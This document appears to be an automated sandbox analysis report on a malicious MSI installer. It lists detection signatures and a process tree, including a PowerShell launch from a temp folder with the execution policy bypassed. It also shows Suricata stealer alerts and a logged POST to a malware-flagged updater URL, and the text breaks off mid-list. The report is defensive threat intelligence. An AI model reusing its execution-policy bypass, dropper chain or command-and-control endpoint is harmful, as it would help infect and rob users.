Edit tour

Windows Analysis Report
Setup.msi

Overview

General Information

Sample name:	Setup.msi
Analysis ID:	1589584
MD5:	d8056166749f02a5ef16b4457685354e
SHA1:	203328a2a7befb59c07082ca34e50d4bcef19565
SHA256:	842201299a2233f6582895cf0ee30a911c6b502db18426f4cbb43a2db300eda8
Tags:	HUNmsiuser-smica83
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Bypasses PowerShell execution policy

Potentially malicious time measurement code found

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Msiexec Initiated Connection

Sigma detected: Suspicious MsiExec Embedding Parent

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected AdvancedInstaller

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 2972 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 3148 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 1436 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C MD5: 9D09DC1EDA745A5F87553048E57620CF)

powershell.exe (PID: 7116 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5176 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\suriqk.bat" "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

obs-ffmpeg-mux.exe (PID: 1124 cmdline: "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe" MD5: D3CAC4D7B35BACAE314F48C374452D71)

conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

createdump.exe (PID: 1628 cmdline: "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe" MD5: 71F796B486C7FAF25B9B16233A7CE0CD)

conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AdvancedInstaller	Yara detected AdvancedInstaller	Joe Security

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1436, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7116, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1436, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7116, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1436, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7116, ProcessName: powershell.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.67.162.17, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1436, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: Suspicious MsiExec Embedding Parent

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1436, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7116, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T21:30:24.942056+0100	2829202	1	A Network Trojan was detected	192.168.2.5	49704	172.67.162.17	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://staticmaxepress.com/updater2.php

Avira URL Cloud: Label: malware

Source: C:\Windows\System32\msiexec.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{337A659D-79FE-4CED-9D18-362BBF6F3DBC}

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.162.17:443 -> 192.168.2.5:49704 version: TLS 1.2

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb source: createdump.exe, 00000008.00000000.2286400593.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: ucrtbase.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbk source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source:	Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdbj source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: obs-ffmpeg-mux.exe, 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source:	Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.1.dr
Source:	Binary string: obs-ffmpeg-mux.pdb source: obs-ffmpeg-mux.exe, 0000000B.00000000.2288252908.00007FF649AA5000.00000002.00000001.01000000.00000007.sdmp, obs-ffmpeg-mux.exe, 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb;;;GCTL source: createdump.exe, 00000008.00000000.2286400593.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000002.2289604370.00007FF6FD018000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: Microsoft.Web.WebView2.Core.pdb source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: Setup.msi, 5924ec.msi.1.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source:	Binary string: w32-pthreads.pdb source: obs-ffmpeg-mux.exe, 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.msi, MSI2E72.tmp.1.dr, MSI2EB2.tmp.1.dr, 5924ec.msi.1.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Setup.msi, 5924ec.msi.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 4x nop then push rbx

11_2_00007FF8A7C646C0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.5:49704 -> 172.67.162.17:443

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: staticmaxepress.com

Source: unknown

HTTP traffic detected: POST /updater2.php HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: AdvancedInstallerHost: staticmaxepress.comContent-Length: 71Cache-Control: no-cache

Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: swresample-4.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0K
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: obs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 0000000B.00000002.2292151132.00007FF8A4BAB000.00000002.00000001.01000000.0000000A.sdmp, avformat-60.dll.1.dr	String found in binary or memory: http://dashif.org/guidelines/trickmode
Source: powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Setup.msi, avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr, 5924ec.msi.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000004.00000002.2223957185.0000000004EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2223176965.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: http://schemas.micj
Source: powershell.exe, 00000004.00000002.2223957185.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: obs-ffmpeg-mux.exe, 0000000B.00000002.2292151132.00007FF8A4BAB000.00000002.00000001.01000000.0000000A.sdmp, avformat-60.dll.1.dr	String found in binary or memory: http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-DASH_schema_files/DASH-MPD.xsd
Source: powershell.exe, 00000004.00000002.2223957185.0000000004EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2223176965.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Setup.msi, avformat-60.dll.1.dr, zlib.dll.1.dr, swresample-4.dll.1.dr, 5924ec.msi.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: obs-ffmpeg-mux.exe, 0000000B.00000002.2299398400.00007FF8A6D80000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.videolan.org/x264.html
Source: zlib.dll.1.dr	String found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000004.00000002.2223957185.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: https://aka.ms/winui2/webview2download/Reload():
Source: powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2223957185.0000000004EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2223176965.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2223957185.00000000051CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
